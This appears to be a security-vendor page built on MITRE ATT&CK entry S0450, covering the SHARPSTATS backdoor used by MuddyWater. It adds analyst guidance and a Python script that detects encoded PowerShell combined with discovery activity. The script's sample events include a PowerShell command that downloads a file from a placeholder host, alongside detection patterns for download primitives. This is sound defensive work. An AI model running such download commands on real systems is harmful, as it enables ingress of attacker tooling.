
S0450: SHARPSTATS

SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.[1]

Domain: Enterprise | ID: S0450 | Type: Malware | Object version: 1.1
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

SHARPSTATS matters because it is a Windows .NET backdoor associated in ATT&CK with MuddyWater and linked to discovery, PowerShell execution, command obfuscation, and tool transfer behaviors. For leaders, the decision value is not the malware name alone; it is whether the organization can see a compromised Windows endpoint being profiled, scripted, and used to bring in additional tooling before the incident expands.

Executive priority

Prioritize validation of Windows endpoint visibility, PowerShell governance, and incident response playbooks for backdoor activity. This object has no ATT&CK-provided detection guidance, so executives should ask whether SOC coverage is based on observable behaviors such as discovery commands, obfuscated command lines, and external file transfer rather than only malware signatures. This is also useful evidence for audit and resilience discussions: can the organization prove it collects the data needed to reconstruct execution, user context, network configuration discovery, system information discovery, and tool ingress on affected hosts?

Technical view

Treat SHARPSTATS coverage as behavior-driven. ATT&CK lists the malware as a Windows .NET backdoor and relates it to PowerShell execution, command obfuscation, system network configuration discovery, system owner/user discovery, system information discovery, ingress tool transfer, and system time discovery. SOC and IR teams should validate whether Windows host telemetry can connect process ancestry, command-line content, PowerShell activity, user context, network connections, and downloaded or newly written files into a single investigation timeline. Because tactics are not specified for the malware object and official detection text is not provided, detections should be mapped to the related techniques rather than to unsupported assumptions about payload internals.

Likely telemetry

  • Windows endpoint process creation and parent/child process lineage
  • PowerShell command, script block, and module activity where available
  • Command-line arguments, especially encoded, escaped, or otherwise obfuscated content
  • User logon/session context and account identifiers on the host
  • Host and network configuration discovery evidence such as interface, address, and routing-related command execution

Detection direction

  • Validate behavior-based analytics for PowerShell execution combined with discovery activity on Windows systems.
  • Tune for obfuscated command-line patterns, while accounting for legitimate administration scripts that may use encoding or complex quoting.
  • Correlate user discovery, system information discovery, network configuration discovery, and system time discovery when they occur close to suspicious execution or network activity.
  • Look for ingress tool transfer signals such as unusual external downloads, newly created executables or scripts, or file transfer following backdoor-like execution.
  • Do not rely solely on a SHARPSTATS signature; the supplied ATT&CK object provides no official detection text and the related behaviors are more durable for coverage validation.
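The following is an added example, not code from the ATT&CK object or from Glexia's analysis, showing how the bullets above could be turned into a behavior-based check rather than a signature. It takes constructed Windows process-creation events (the field names, the allow-listed management-agent parent `example_mgmt_agent.exe`, and the discovery command list are all assumptions), decodes `-EncodedCommand` PowerShell launches, tallies the discovery categories the page relates to SHARPSTATS (T1016, T1033, T1082, T1124) and an ingress-tool-transfer signal (T1105) in the decoded script and in later command lines on the same host, and alerts only when the encoded launch is accompanied by that wider activity. The parent-process allow-list is the hook for the "legitimate administration scripts" caveat.

```python
"""Constructed example: correlate encoded PowerShell with discovery and ingress activity per host.
Not part of the ATT&CK object or Glexia's analysis; event schema and allow-list are assumptions."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery indicators grouped by the ATT&CK techniques the page relates to SHARPSTATS.
# These are ordinary Windows/PowerShell discovery commands, chosen here as illustration.
DISCOVERY_PATTERNS = {
    "T1016 network config": re.compile(r"\b(ipconfig|Get-NetIPConfiguration|USERDOMAIN)\b", re.I),
    "T1033 owner/user": re.compile(r"\b(whoami|USERNAME)\b", re.I),
    "T1082 system info": re.compile(r"\b(systeminfo|hostname|COMPUTERNAME|Win32_OperatingSystem)\b", re.I),
    "T1124 system time": re.compile(r"\b(Get-Date|date|time)\b", re.I),
}
# Download/upload primitives used as the T1105 ingress signal.
INGRESS_PATTERN = re.compile(r"(Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer)", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (covers the common abbreviations).
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Assumed allow-list of management-agent parents whose encoded PowerShell is expected (placeholder name).
ALLOWED_PARENTS = {"example_mgmt_agent.exe"}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind an -EncodedCommand argument, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_for_sample(script):
    """Build the -EncodedCommand form of a script (used only to construct the sample events)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_events(events, window=timedelta(minutes=10)):
    """For each encoded PowerShell launch, tally discovery techniques and ingress signals seen in the
    decoded script and in later command lines on the same host inside the window. Alert when the
    launch is accompanied by at least two discovery categories or by an ingress signal."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        for i, ev in enumerate(evs):
            if not ev["image"].lower().endswith("powershell.exe"):
                continue
            decoded = decode_encoded_command(ev["cmdline"])
            # Skip non-encoded launches and encoded launches from known management tooling.
            if decoded is None or ev["parent"].lower() in ALLOWED_PARENTS:
                continue
            texts = [decoded] + [x["cmdline"] for x in evs[i + 1:] if x["ts"] - ev["ts"] <= window]
            techniques = {"T1027.010 encoded command"}
            ingress = False
            for text in texts:
                for name, pat in DISCOVERY_PATTERNS.items():
                    if pat.search(text):
                        techniques.add(name)
                if INGRESS_PATTERN.search(text):
                    ingress = True
            if len(techniques) >= 3 or ingress:
                alerts.append({"host": host, "user": ev["user"], "ts": ev["ts"],
                               "techniques": sorted(techniques), "ingress": ingress,
                               "decoded_preview": decoded[:80]})
    return alerts


# Constructed sample telemetry (three hosts; only WS01 should alert).
T0 = datetime(2024, 1, 1, 9, 0, 0)
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    # WS01: encoded launch that profiles the host, then a download three minutes later -> alert
    {"ts": T0, "host": "WS01", "user": "CORP\\alice", "image": PS, "parent": "explorer.exe",
     "cmdline": "powershell.exe -NonInteractive -EncodedCommand "
                + encode_for_sample("whoami; hostname; Get-Date; ipconfig /all")},
    {"ts": T0 + timedelta(minutes=3), "host": "WS01", "user": "CORP\\alice", "image": PS, "parent": "explorer.exe",
     "cmdline": 'powershell.exe -c "Invoke-WebRequest -Uri http://example.invalid/u.bin -OutFile C:\\Users\\Public\\u.bin"'},
    # WS02: encoded command launched by the allow-listed management agent -> suppressed
    {"ts": T0, "host": "WS02", "user": "NT AUTHORITY\\SYSTEM", "image": PS, "parent": "example_mgmt_agent.exe",
     "cmdline": "powershell.exe -enc " + encode_for_sample("Get-Service | Out-File C:\\ProgramData\\svc.txt")},
    # WS03: encoded, but no discovery or ingress activity around it -> no alert
    {"ts": T0, "host": "WS03", "user": "CORP\\bob", "image": PS, "parent": "cmd.exe",
     "cmdline": "powershell.exe -enc " + encode_for_sample("Get-ChildItem C:\\Temp | Measure-Object")},
]

if __name__ == "__main__":
    for alert in analyze_events(SAMPLE_EVENTS):
        print(alert)
```

The scoring threshold (encoded launch plus two discovery categories, or plus an ingress signal) is a starting point for tuning; in production the allow-list would be driven by signed-script or management-platform inventory rather than a parent image name, and the window and thresholds adjusted against the environment's own baseline of encoded PowerShell.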

Mitigation priorities

  • Ensure PowerShell logging and endpoint process telemetry are enabled and retained for investigation.
  • Apply least privilege and administrative script control practices appropriate to Windows environments.
  • Review controls that limit or monitor unauthorized tool downloads and file transfers from external systems.
  • Maintain incident response procedures for triaging a suspected backdoor: isolate host, preserve execution and network evidence, identify user context, and search for related discovery and transfer activity.
  • Use the related ATT&CK techniques to test detection coverage and document control evidence for compliance or readiness assessments.

Analyst notes and limits

ATT&CK identifies SHARPSTATS as a .NET backdoor used by MuddyWater since at least 2019, with the Trend Micro POWERSTATS V3 report as the cited source. The most useful defensive framing comes from the relationships to ATT&CK techniques: PowerShell, command obfuscation, multiple discovery behaviors, and ingress tool transfer.

The supplied ATT&CK fields do not include official detection guidance, aliases, labels, malware tactics, or detailed procedure examples. Local environment data is required to determine whether observed PowerShell, discovery, or file transfer activity is malicious or legitimate administration.

Official MITRE ATT&CK definition

SHARPSTATS

SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.[1]


Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

7 rows (Domain / ID / Name / Relationship or procedure)

Enterprise T1016 System Network Configuration Discovery
  SHARPSTATS has the ability to identify the domain of the compromised host. [1]

Enterprise T1059.001 PowerShell (Sub-technique)
  SHARPSTATS has the ability to employ a custom PowerShell script. [1]

Enterprise T1105 Ingress Tool Transfer
  SHARPSTATS has the ability to upload and download files. [1]

Enterprise T1027.010 Command Obfuscation (Sub-technique)
  SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts. [1]

Enterprise T1082 System Information Discovery
  SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host. [1]

Enterprise T1124 System Time Discovery
  SHARPSTATS has the ability to identify the current date and time on the compromised host. [1]

Enterprise T1033 System Owner/User Discovery
  SHARPSTATS has the ability to identify the username on the compromised host. [1]

Associated objects

Groups, software, and campaigns

Group Enterprise

G0069: MuddyWater

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication.[2][3][4][5][6][7][8][9][10][11][12][13]

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources (Updates).

ATT&CK release: 19.1
Object version: 1.1
Created: (not provided)
Modified: (not provided)
Raw hash: f084732cdbd4d6a9...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | (not provided) | 1.1 | (not provided) | Current bundle | f084732cdbd4…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] TrendMicro POWERSTATS V3 June 2019
     Lunghi, D. and Horejsi, J. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  2. [2] mitre-attack S0450

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.